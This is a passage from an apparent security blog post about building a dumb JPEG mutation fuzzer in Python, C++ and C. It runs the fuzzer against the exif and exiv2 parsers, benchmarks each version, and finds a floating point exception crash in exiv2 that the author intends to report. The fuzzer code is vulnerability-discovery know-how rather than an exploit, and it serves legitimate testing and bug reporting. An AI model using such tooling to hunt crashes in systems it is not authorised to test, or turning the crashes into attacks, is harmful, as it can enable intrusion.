	std::ifstream fin(filename, std::ios::binary);

	if (fin.is_open())
	{
		fin.seekg(0, std::ios::end);
		std::string data;
		data.resize(fin.tellg());
		fin.seekg(0, std::ios::beg);
		fin.read(&data[0], data.size());

		return data;
	}

	else
	{
		std::cout << "Failed to open " << filename << ".\n";
		exit(1);
	}

}

This function, as my comment says, simply retrieves a byte string from our target file, which in the case of our testing will still be Canon_40D.jpg.

//
// this will take 1% of the bytes from our valid jpeg and
// flip a random bit in the byte and return the altered string
//
std::string bit_flip(std::string data)
{
	
	int size = (data.length() - 4);
	int num_of_flips = (int)(size * .01);

	// get a vector full of 1% of random byte indexes
	std::vector<int> picked_indexes;
	for (int i = 0; i < num_of_flips; i++)
	{
		int picked_index = rand() % size;
		picked_indexes.push_back(picked_index);
	}

	// iterate through the data string at those indexes and flip a bit
	for (int i = 0; i < picked_indexes.size(); ++i)
	{
		int index = picked_indexes[i];
		char current = data.at(index);
		int decimal = ((int)current & 0xff);
		
		int bit_to_flip = rand() % 8;
		
		decimal ^= 1 << bit_to_flip;
		decimal &= 0xff;
		
		data[index] = (char)decimal;
	}

	return data;

}

This function is a direct equivalent of our bit_flip() function in our Python script.

//
// takes mutated string and creates new jpeg with it;
//
void create_new(std::string mutated)
{
	std::ofstream fout("mutated.jpg", std::ios::binary);

	if (fout.is_open())
	{
		fout.seekp(0, std::ios::beg);
		fout.write(&mutated[0], mutated.size());
	}
	else
	{
		std::cout << "Failed to create mutated.jpg" << ".\n";
		exit(1);
	}

}

This function will simply create a temporary mutated.jpg file, similar to our create_new() function that we had in the Python script.

//
// function to run a system command and store the output as a string;
// https://www.jeremymorgan.com/tutorials/c-programming/how-to-capture-the-output-of-a-linux-command-in-c/
//
std::string get_output(std::string cmd)
{
	std::string output;
	FILE * stream;
	char buffer[256];

	stream = popen(cmd.c_str(), "r");
	if (stream)
	{
		while (!feof(stream))
		{
			if (fgets(buffer, 256, stream) != NULL)
				output.append(buffer);
		}
		pclose(stream);
	}

	return output;

}

//
// we actually run our exiv2 command via the get_output() func;
// retrieve the output in the form of a string and then we can parse the string;
// we'll save all the outputs that result in a segfault or floating point except;
//
void exif(std::string mutated, int counter)
{
	std::string command = "exif mutated.jpg -verbose 2>&1";

	std::string output = get_output(command);

	std::string segfault = "Segmentation";
	std::string floating_point = "Floating";

	std::size_t pos1 = output.find(segfault);
	std::size_t pos2 = output.find(floating_point);

	if (pos1 != -1)
	{
		std::cout << "Segfault!\n";
		std::ostringstream oss;
		oss << "/root/cppcrashes/crash." << counter << ".jpg";
		std::string filename = oss.str();
		std::ofstream fout(filename, std::ios::binary);

		if (fout.is_open())
			{
				fout.seekp(0, std::ios::beg);
				fout.write(&mutated[0], mutated.size());
			}
		else
		{
			std::cout << "Failed to create " << filename << ".jpg" << ".\n";
			exit(1);
		}
	}
	else if (pos2 != -1)
	{
		std::cout << "Floating Point!\n";
		std::ostringstream oss;
		oss << "/root/cppcrashes/crash." << counter << ".jpg";
		std::string filename = oss.str();
		std::ofstream fout(filename, std::ios::binary);

		if (fout.is_open())
			{
				fout.seekp(0, std::ios::beg);
				fout.write(&mutated[0], mutated.size());
			}
		else
		{
			std::cout << "Failed to create " << filename << ".jpg" << ".\n";
			exit(1);
		}
	}
}

These two functions work together. get_output takes a C++ string as a parameter and will run that command on the operating system and capture the output. The function then returns the output as a string to the calling function exif().

exif() will take the output and look for Segmentation fault or Floating point exception errors and then if found, will write those bytes to a file and save them as a crash.<counter>.jpg file. Very similar to our Python fuzzer.

//
// simply generates a vector of strings that are our 'magic' values;
//
std::vector<std::string> vector_gen()
{
	std::vector<std::string> magic;

	using namespace std::string_literals;

	magic.push_back("\xff");
	magic.push_back("\x7f");
	magic.push_back("\x00"s);
	magic.push_back("\xff\xff");
	magic.push_back("\x7f\xff");
	magic.push_back("\x00\x00"s);
	magic.push_back("\xff\xff\xff\xff");
	magic.push_back("\x80\x00\x00\x00"s);
	magic.push_back("\x40\x00\x00\x00"s);
	magic.push_back("\x7f\xff\xff\xff");

	return magic;
}

//
// randomly picks a magic value from the vector and overwrites that many bytes in the image;
//
std::string magic(std::string data, std::vector<std::string> magic)
{
	
	int vector_size = magic.size();
	int picked_magic_index = rand() % vector_size;
	std::string picked_magic = magic[picked_magic_index];
	int size = (data.length() - 4);
	int picked_data_index = rand() % size;
	data.replace(picked_data_index, magic[picked_magic_index].length(), magic[picked_magic_index]);

	return data;

}

//
// returns 0 or 1;
//
int func_pick()
{
	int result = rand() % 2;

	return result;
}

These functions are pretty similar to our Python implementation as well. vector_gen() pretty much just creates our vector of ‘magic values’ and then subsequent functions like magic() use the vector to randomly pick an index and then overwrite data in the valid jpeg with mutated data accordingly.

func_pick() is very simple and just returns a 0 or a 1 so that our fuzzer can randomly bit_flip() or magic() mutate our valid jpeg. To keep things consistent, let’s have our fuzzer only choose bit_flip() for the time being by adding a temporary line of function = 1 to our program so that we match our Python testing.

Here is our main() function which executes all of our code so far:

int main(int argc, char** argv)
{

	if (argc < 3)
	{
		std::cout << "Usage: ./cppfuzz <valid jpeg> <number_of_fuzzing_iterations>\n";
		std::cout << "Usage: ./cppfuzz Canon_40D.jpg 10000\n";
		return 1;
	}

	// start timer
	auto start = std::chrono::high_resolution_clock::now();

	// initialize our random seed
	srand((unsigned)time(NULL));

	// generate our vector of magic numbers
	std::vector<std::string> magic_vector = vector_gen();

	std::string filename = argv[1];
	int iterations = atoi(argv[2]);

	int counter = 0;
	while (counter < iterations)
	{

		std::string data = get_bytes(filename);

		int function = func_pick();
		function = 1;
		if (function == 0)
		{
			// utilize the magic mutation method; create new jpg; send to exiv2
			std::string mutated = magic(data, magic_vector);
			create_new(mutated);
			exif(mutated,counter);
			counter++;
		}
		else
		{
			// utilize the bit flip mutation; create new jpg; send to exiv2
			std::string mutated = bit_flip(data);
			create_new(mutated);
			exif(mutated,counter);
			counter++;
		}
	}

	// stop timer and print execution time
	auto stop = std::chrono::high_resolution_clock::now();
	auto duration = std::chrono::duration_cast<std::chrono::milliseconds>(stop - start);
	std::cout << "Execution Time: " << duration.count() << "ms\n";

	return 0;
}

We get a valid JPEG to mutate and a number of fuzzing iterations from the command line arguments. We then have some timing mechanisms in place with the std::chrono namespace to time how long our program takes to execute.

We’re kind of cheating here by only selecting bit_flip() type mutations, but that is what we did in Python as well so we want an ‘Apples to Apples’ comparison.

Let’s go ahead and run this for 100,000 iterations and compare it our Python fuzzer benchmark of 256 seconds.

Once we run our C++ fuzzer, we get a printed time spent in milliseconds of: Execution Time: 172638ms or 172 seconds.

So we comfortably destroyed our Python fuzzer with our new C++ fuzzer! This is so exciting. Let’s go ahead and do some math here: 172/256 = 67%. So we’re roughly 33% faster with our C++ implementation. (God I hope you aren’t some 200 IQ math genius reading this and throwing up on your keyboard).

Let’s take our optimized Python and C++ fuzzers and take on a new target!

Selecting a New Victim

Looking at what comes pre-installed on Kali Linux since that’s our operating environment, let’s take a peek at exiv2 which is found in /usr/bin/exiv2.

root@kali:~# exiv2 -h
Usage: exiv2 [ options ] [ action ] file ...

Manipulate the Exif metadata of images.

Actions:
  ad | adjust   Adjust Exif timestamps by the given time. This action
                requires at least one of the -a, -Y, -O or -D options.
  pr | print    Print image metadata.
  rm | delete   Delete image metadata from the files.
  in | insert   Insert metadata from corresponding *.exv files.
                Use option -S to change the suffix of the input files.
  ex | extract  Extract metadata to *.exv, *.xmp and thumbnail image files.
  mv | rename   Rename files and/or set file timestamps according to the
                Exif create timestamp. The filename format can be set with
                -r format, timestamp options are controlled with -t and -T.
  mo | modify   Apply commands to modify (add, set, delete) the Exif and
                IPTC metadata of image files or set the JPEG comment.
                Requires option -c, -m or -M.
  fi | fixiso   Copy ISO setting from the Nikon Makernote to the regular
                Exif tag.
  fc | fixcom   Convert the UNICODE Exif user comment to UCS-2. Its current
                character encoding can be specified with the -n option.

Options:
   -h      Display this help and exit.
   -V      Show the program version and exit.
   -v      Be verbose during the program run.
   -q      Silence warnings and error messages during the program run (quiet).
   -Q lvl  Set log-level to d(ebug), i(nfo), w(arning), e(rror) or m(ute).
   -b      Show large binary values.
   -u      Show unknown tags.
   -g key  Only output info for this key (grep).
   -K key  Only output info for this key (exact match).
   -n enc  Charset to use to decode UNICODE Exif user comments.
   -k      Preserve file timestamps (keep).
   -t      Also set the file timestamp in 'rename' action (overrides -k).
   -T      Only set the file timestamp in 'rename' action, do not rename
           the file (overrides -k).
   -f      Do not prompt before overwriting existing files (force).
   -F      Do not prompt before renaming files (Force).
   -a time Time adjustment in the format [-]HH[:MM[:SS]]. This option
           is only used with the 'adjust' action.
   -Y yrs  Year adjustment with the 'adjust' action.
   -O mon  Month adjustment with the 'adjust' action.
   -D day  Day adjustment with the 'adjust' action.
   -p mode Print mode for the 'print' action. Possible modes are:
             s : print a summary of the Exif metadata (the default)
             a : print Exif, IPTC and XMP metadata (shortcut for -Pkyct)
             t : interpreted (translated) Exif data (-PEkyct)
             v : plain Exif data values (-PExgnycv)
             h : hexdump of the Exif data (-PExgnycsh)
             i : IPTC data values (-PIkyct)
             x : XMP properties (-PXkyct)
             c : JPEG comment
             p : list available previews
             S : print structure of image
             X : extract XMP from image
   -P flgs Print flags for fine control of tag lists ('print' action):
             E : include Exif tags in the list
             I : IPTC datasets
             X : XMP properties
             x : print a column with the tag number
             g : group name
             k : key
             l : tag label
             n : tag name
             y : type
             c : number of components (count)
             s : size in bytes
             v : plain data value
             t : interpreted (translated) data
             h : hexdump of the data
   -d tgt  Delete target(s) for the 'delete' action. Possible targets are:
             a : all supported metadata (the default)
             e : Exif section
             t : Exif thumbnail only
             i : IPTC data
             x : XMP packet
             c : JPEG comment
   -i tgt  Insert target(s) for the 'insert' action. Possible targets are
           the same as those for the -d option, plus a modifier:
             X : Insert metadata from an XMP sidecar file <file>.xmp
           Only JPEG thumbnails can be inserted, they need to be named
           <file>-thumb.jpg
   -e tgt  Extract target(s) for the 'extract' action. Possible targets
           are the same as those for the -d option, plus a target to extract
           preview images and a modifier to generate an XMP sidecar file:
             p[<n>[,<m> ...]] : Extract preview images.
             X : Extract metadata to an XMP sidecar file <file>.xmp
   -r fmt  Filename format for the 'rename' action. The format string
           follows strftime(3). The following keywords are supported:
             :basename:   - original filename without extension
             :dirname:    - name of the directory holding the original file
             :parentname: - name of parent directory
           Default filename format is %Y%m%d_%H%M%S.
   -c txt  JPEG comment string to set in the image.
   -m file Command file for the modify action. The format for commands is
           set|add|del <key> [[<type>] <value>].
   -M cmd  Command line for the modify action. The format for the
           commands is the same as that of the lines of a command file.
   -l dir  Location (directory) for files to be inserted from or extracted to.
   -S .suf Use suffix .suf for source files for insert command.

Looking at the help guidance, let’s just go ahead and randomly take a crack at pr for Print image metadata and also -v for Be verbose during the program run. You can see from this help guidance that there is plenty of attack surface here for us to explore, but let’s keep things simple for now.

Our command string now in our fuzzers will be something like exiv2 pr -v mutated.jpg.
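
For the C++ fuzzer, only the command string inside exif() should need to change. A one-line sketch of that assumption, with the rest of the function (the Segmentation/Floating output parsing) staying as-is; the 2>&1 redirect mirrors the existing implementation so get_output() still captures the error text:

std::string command = "exiv2 pr -v mutated.jpg 2>&1";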

Let’s go ahead and update our fuzzers and see if we can find some more bugs on a much harder target. It’s worth mentioning that this target is actively maintained and is not a trivial binary to find bugs in, unlike our last target (an unsupported, 7-year-old project on GitHub).

This target has already been fuzzed by much more advanced fuzzers; you can simply google something like ‘ASan exiv2’ and get plenty of hits where fuzzers have produced segfaults in the binary and the ASan output has been forwarded to the GitHub repository as a bug report. This is a significant step up from our last target.

exiv2 on GitHub

exiv2 Website

Fuzzing Our New Target

Let’s start off with our new and improved Python fuzzer and monitor its performance over 50,000 iterations. Let’s add some code that monitors for Floating Point exceptions in addition to our Segmentation fault detection (call it a hunch!). Our new exif() function will look like this:

def exif(counter,data):

    # requires: from subprocess import Popen, PIPE
    p = Popen(["exiv2", "pr", "-v", "mutated.jpg"], stdout=PIPE, stderr=PIPE)
    (out, err) = p.communicate()

    # a returncode of -N means the child was killed by signal N,
    # so -11 is SIGSEGV and -8 is SIGFPE
    if p.returncode == -11:
        f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+")
        f.write(data)
        f.close()
        print("Segfault!")

    elif p.returncode == -8:
        f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+")
        f.write(data)
        f.close()
        print("Floating Point!")

Looking at the output from python3 -m cProfile -s cumtime subpro.py ~/jpegs/Canon_40D.jpg:

75780446 function calls (75780309 primitive calls) in 213.595 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000  213.595  213.595 {built-in method builtins.exec}
        1    1.481    1.481  213.595  213.595 subpro.py:3(<module>)
    50000    0.818    0.000  187.205    0.004 subpro.py:111(exif)
    50000    0.543    0.000  143.499    0.003 subprocess.py:920(communicate)
    50000    6.773    0.000  142.873    0.003 subprocess.py:1662(_communicate)
  1641352    3.186    0.000  122.668    0.000 selectors.py:402(select)
  1641352  118.799    0.000  118.799    0.000 {method 'poll' of 'select.poll' objects}
    50000    1.220    0.000   42.888    0.001 subprocess.py:681(__init__)
    50000    4.400    0.000   39.364    0.001 subprocess.py:1412(_execute_child)
  1691919   25.759    0.000   25.759    0.000 {built-in method posix.read}
    50000    3.863    0.000   13.938    0.000 subpro.py:14(bit_flip)
  7950000    3.587    0.000    9.991    0.000 random.py:256(choice)
    50000    7.495    0.000    7.495    0.000 {built-in method _posixsubprocess.fork_exec}
    50000    0.148    0.000    7.081    0.000 subpro.py:105(create_new)
  7950000    3.884    0.000    5.764    0.000 random.py:224(_randbelow)
   200000    4.582    0.000    4.582    0.000 {built-in method io.open}
    50000    4.192    0.000    4.192    0.000 {method 'close' of '_io.BufferedRandom' objects}
    50000    1.339    0.000    3.612    0.000 os.py:617(get_exec_path)
    50000    1.641    0.000    3.309    0.000 subpro.py:8(get_bytes)
   100000    0.077    0.000    1.822    0.000 subprocess.py:1014(wait)
   100000    0.432    0.000    1.746    0.000 subprocess.py:1621(_wait)
   100000    0.256    0.000    1.735    0.000 selectors.py:351(register)
   100000    0.619    0.000    1.422    0.000 selectors.py:234(register)
   350000    0.380    0.000    1.402    0.000 subprocess.py:1471(<genexpr>)
 12066004    1.335    0.000    1.335    0.000 {method 'getrandbits' of '_random.Random' objects}
    50000    0.063    0.000    1.222    0.000 subprocess.py:1608(_try_wait)
    50000    1.160    0.000    1.160    0.000 {built-in method posix.waitpid}
   100000    0.519    0.000    1.143    0.000 os.py:674(__getitem__)
  1691352    0.902    0.000    1.097    0.000 selectors.py:66(__len__)
  7234121    1.023    0.000    1.023    0.000 {method 'append' of 'list' objects}
-----SNIP-----

It appears we took 213 seconds total and didn’t really find any bugs. That’s a shame, but it could just be luck. Let’s run our C++ fuzzer under the exact same circumstances and monitor the output.

Here we go, we finish the same run with a much improved time:

root@kali:~# ./blogcpp ~/jpegs/Canon_40D.jpg 50000
Execution Time: 170829ms

That’s a pretty significant improvement: 43 seconds, or about 20% off of our Python time. (Again, I apologize to the math people.)

Let’s keep our C++ fuzzer running for a bit and see if we find any bugs :).

Bugs on Our New Target!

After maybe 10 seconds of running the fuzzer again, I got this terminal output:

root@kali:~# ./blogcpp ~/jpegs/Canon_40D.jpg 1000000
Floating Point!

It appears we have satisfied the requirements for a Floating Point exception. We should have a nice jpg waiting for us in the cppcrashes directory.

root@kali:~/cppcrashes# ls
crash.522.jpg

Let’s confirm the bug by running exiv2 against this sample:

root@kali:~/cppcrashes# exiv2 pr -v crash.522.jpg
File 1/1: crash.522.jpg
Error: Offset of directory Image, entry 0x011b is out of bounds: Offset = 0x080000ae; truncating the entry
Warning: Directory Image, entry 0x8825 has unknown Exif (TIFF) type 68; setting type size 1.
Warning: Directory Image, entry 0x8825 doesn't look like a sub-IFD.
File name       : crash.522.jpg
File size       : 7958 Bytes
MIME type       : image/jpeg
Image size      : 100 x 68
Camera make     : Aanon
Camera model    : Canon EOS 40D
Image timestamp : 2008:05:30 15:56:01
Image number    : 
Exposure time   : 1/160 s
Aperture        : F7.1
Floating point exception

We indeed found a new bug! This is super exciting. We should issue a bug report to the exiv2 developers on GitHub.

Conclusion

We first optimized our fuzzer in Python and then rewrote it in C++. We gained some massive performance advantages and even found some new bugs on a new, harder target.

For some fun, let’s compare our original fuzzer’s performance for 50,000 iterations:

123052109 function calls (123001828 primitive calls) in 6243.939 seconds

As you can see, 6,243 seconds is significantly slower than our C++ fuzzer benchmark of 170 seconds.

Addendum 15/May/2020

Just playing around with porting the C++ fuzzer to C, I made some modest improvements on my own. One of the logic changes was to read the data from the original valid image only once, then copy that data into a newly allocated buffer each fuzzing iteration and perform the mutation operations on that fresh buffer (a minimal sketch of this pattern follows the timing comparison below). This C version of essentially the same C++ fuzzer performed noticeably better. Here is a comparison between the two for 200,000 iterations (you can ignore the crash findings, as this fuzzer is extremely dumb and 100% random):

h0mbre:~$ time ./cppfuzz Canon_40D.jpg 200000
<snipped_results>

real    10m45.371s
user    7m14.561s
sys     3m10.529s

h0mbre:~$ time ./cfuzz Canon_40D.jpg 200000
<snipped_results>

real    10m7.686s
user    7m27.503s
sys     2m20.843s

So, over 200,000 iterations we end up saving about 35-40 seconds, which was pretty typical in my testing. Just by making a few logic changes and leaning on fewer C++-provided abstractions, we saved a lot of sys time and increased speed by about 6%.
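
To make that logic change concrete, here is a minimal sketch of the read-once, copy-per-iteration pattern. This is an illustration under my own assumptions rather than the exact code from the C port; the function names and the one-byte mutation are placeholders.

// Sketch of reading the seed image once and handing each fuzzing iteration
// its own heap copy to mutate; illustrative only, not the exact C fuzzer.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// read the valid seed image into memory exactly once
static unsigned char *read_seed(const char *path, long *len_out) {
    FILE *fp = fopen(path, "rb");
    if (!fp) { perror("fopen"); exit(1); }

    fseek(fp, 0, SEEK_END);
    long len = ftell(fp);
    rewind(fp);

    unsigned char *buf = malloc(len);
    if (!buf || fread(buf, 1, len, fp) != (size_t)len) {
        perror("read_seed");
        exit(1);
    }
    fclose(fp);

    *len_out = len;
    return buf;
}

int main(int argc, char **argv) {
    if (argc != 3) {
        printf("usage: %s <valid.jpg> <iterations>\n", argv[0]);
        return 1;
    }

    long seed_len = 0;
    unsigned char *seed = read_seed(argv[1], &seed_len);
    int iterations = atoi(argv[2]);

    for (int i = 0; i < iterations; i++) {
        // fresh copy of the pristine seed bytes for this iteration only
        unsigned char *work = malloc(seed_len);
        memcpy(work, seed, seed_len);

        // dumb placeholder mutation: flip one pseudo-random byte past the SOI marker
        work[(rand() % (seed_len - 4)) + 4] ^= 0xFF;

        // write the mutated copy out for the target to consume
        FILE *out = fopen("mutated.jpg", "wb");
        if (!out) { perror("fopen"); exit(1); }
        fwrite(work, 1, seed_len, out);
        fclose(out);

        // ... hand mutated.jpg to the target and check its exit status here ...

        free(work);
    }

    free(seed);
    return 0;
}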

Monitoring Child Process Exit Status

After completing the C translation, I went to Twitter to ask for suggestions about performance improvements. @lcamtuf, the creator of AFL, explained to me that I shouldn’t be using popen() in my code as it spawns a shell and performs abysmally. Here is the code segment I asked for help on:

void exif(int iteration) {
    
    FILE *fileptr;
    
    //fileptr = popen("exif_bin target.jpeg -verbose >/dev/null 2>&1", "r");
    fileptr = popen("exiv2 pr -v mutated.jpeg >/dev/null 2>&1", "r");

    int status = WEXITSTATUS(pclose(fileptr));
    switch(status) {
        case 253:
            break;
        case 0:
            break;
        case 1:
            break;
        default:
            crashes++;
            printf("\r[>] Crashes: %d", crashes);
            fflush(stdout);
            char command[50];
            sprintf(command, "cp mutated.jpeg ccrashes/crash.%d.%d",
             iteration,status);
            system(command);
            break;
    }
}
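
For context on why this approach is slow: popen() hands the whole command string to /bin/sh, so on top of executing exiv2, every single fuzz case also pays for forking and exec’ing a shell (and having it parse the command and redirections). A rough sketch of what each popen()/pclose() pair is doing behind the scenes, with illustrative names and the pipe plumbing omitted:

#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

// roughly what popen("exiv2 pr -v mutated.jpeg >/dev/null 2>&1", "r") costs us:
// one extra fork and one /bin/sh exec, and only then does the shell run exiv2
static int run_via_shell(const char *command) {
    pid_t pid = fork();                       // extra process just for the shell
    if (pid == 0) {
        execl("/bin/sh", "sh", "-c", command, (char *)NULL);
        _exit(127);                           // only reached if the exec fails
    }
    int status = 0;
    waitpid(pid, &status, 0);                 // pclose() effectively performs this wait
    return status;
}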

As you can see in the original function, we use popen(), run a shell command, and then close the file pointer to the child process, returning the exit status for monitoring with the WEXITSTATUS macro. I was filtering out some exit codes that I didn’t care about, like 253, 0, and 1, and was hoping to see some related to the floating point errors we already found with our C++ fuzzer, or maybe even a segfault. @lcamtuf suggested that instead of popen(), I call fork() to spawn a child process, execvp() to have the child process execute a command, and finally use waitpid() to await the child process’s termination and return the exit status.

Since we don’t have a proper shell in this syscall path, I had to also open a handle to /dev/null and call dup2() to route both stdout and stderr there as we don’t care about the command output. I also used the WTERMSIG macro to retrieve the signal that terminated the child process in the event that the WIFSIGNALED macro returned true, which would indicate we got a segfault or floating point exception, etc. So now, our updated function looks like this:

void exif(int iteration) {

    // argv[0] is conventionally the program name; the action and options
    // follow it, and the array must be NULL-terminated for execvp()
    char* file = "exiv2";
    char* argv[5];
    argv[0] = "exiv2";
    argv[1] = "pr";
    argv[2] = "-v";
    argv[3] = "mutated.jpeg";
    argv[4] = NULL;
    pid_t child_pid;
    int child_status;

    child_pid = fork();
    if (child_pid == 0) {
        // this means we're the child process
        int fd = open("/dev/null", O_WRONLY);

        // dup both stdout and stderr and send them to /dev/null
        dup2(fd, 1);
        dup2(fd, 2);
        close(fd);

        execvp(file, argv);
        // shouldn't return, if it does, we have an error with the command
        printf("[!] Unknown command for execvp, exiting...\n");
        exit(1);
    }
    else {
        // this is run by the parent process
        do {
            pid_t tpid = waitpid(child_pid, &child_status, WUNTRACED |
             WCONTINUED);
            if (tpid == -1) {
                printf("[!] Waitpid failed!\n");
                perror("waitpid");
            }
            if (WIFEXITED(child_status)) {
                //printf("WIFEXITED: Exit Status: %d\n", WEXITSTATUS(child_status));
            } else if (WIFSIGNALED(child_status)) {
                crashes++;
                int exit_status = WTERMSIG(child_status);
                printf("\r[>] Crashes: %d", crashes);
                fflush(stdout);
                char command[50];
                sprintf(command, "cp mutated.jpeg ccrashes/%d.%d", iteration, 
                exit_status);
                system(command);
            } else if (WIFSTOPPED(child_status)) {
                printf("WIFSTOPPED: Exit Status: %d\n", WSTOPSIG(child_status));
            } else if (WIFCONTINUED(child_status)) {
                printf("WIFCONTINUED: Exit Status: Continued.\n");
            }
        } while (!WIFEXITED(child_status) && !WIFSIGNALED(child_status));
    }
}

You can see that this drastically improves performance for our 200,000 iteration benchmark:

h0mbre:~$ time ./cfuzz2 Canon_40D.jpg 200000
<snipped_results>

real    8m30.371s
user    6m10.219s
sys     2m2.098s

Summary of Results

  • C++ Fuzzer – 310 iterations/sec
  • C Fuzzer – 329 iterations/sec (+ 6%)
  • C Fuzzer 2.0 – 392 iterations/sec (+ 26%)

Thanks to @lcamtuf and @carste1n for the help.

I’ve uploaded the code here: https://github.com/h0mbre/Fuzzing/tree/master/JPEGMutation
